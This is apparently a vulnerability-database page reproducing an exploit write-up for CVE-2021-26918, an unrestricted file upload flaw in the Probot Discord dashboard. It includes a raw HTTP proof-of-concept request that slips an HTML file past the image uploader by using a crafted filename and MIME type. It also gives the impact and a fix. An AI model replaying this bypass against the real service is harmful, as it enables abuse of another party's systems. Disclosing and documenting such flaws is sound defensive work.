Loading
0

CVE-2021-26918 Discord Probot 任意文件上传漏洞

PWNWIK.COM

,

# Exploit Title: Discord Probot - Unrestricted File Upload 
# Google Dork: N/A
# Date: 2021-02-08
# Exploit Author: ThelastVvV
# Vendor Homepage:probot.io
# Version:Version 2021
# Tested on: Debian 5.7.10-1parrot2
# CVE:CVE-2021-26918


About:
Probot is a discord very customizable multipurpose bot for welcome image, In-depth logs, Social commands, Music, Moderation and many more ...

# Description:

The attacker can acces to probot dashboard and use image uploader in the welcomer tab , the attacl can upload many file types  due the issues of unrestricted file uploads which can be bypassed by changing multipart/form-data POST request with a specially-crafted filename or mime type.

# PoC:


POST / HTTP/1.1
Host: uploader.probot.io
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------
Content-Length: 333
Origin: https://probot.io
DNT: 1
Connection: close
Referer: https://probot.io/server/""/welcomer

-----------------------------
Content-Disposition: form-data; name="file"; filename="ste.html.jpg"
Content-Type: text/html

<!DOCTYPE html>
<html>
  <head>
    <title>bypasss</title>
  </head>
  <body>
    <div>bypass</div>
  </body>
</html>

-------------------------------

Note:the link of the file will be generated depend on the content type in this case .html

# Impact
Unrestricted file uploads can be abused to exploit other vulnerable sections of an application when a file on the same or a trusted server is needed (can again lead to client-side or server-side attacks)

#Solution
File types should be restricted to only jpg ,png ,jpeg  (text/img)

免费、自由、人人可编辑的漏洞库--pwnwiki.com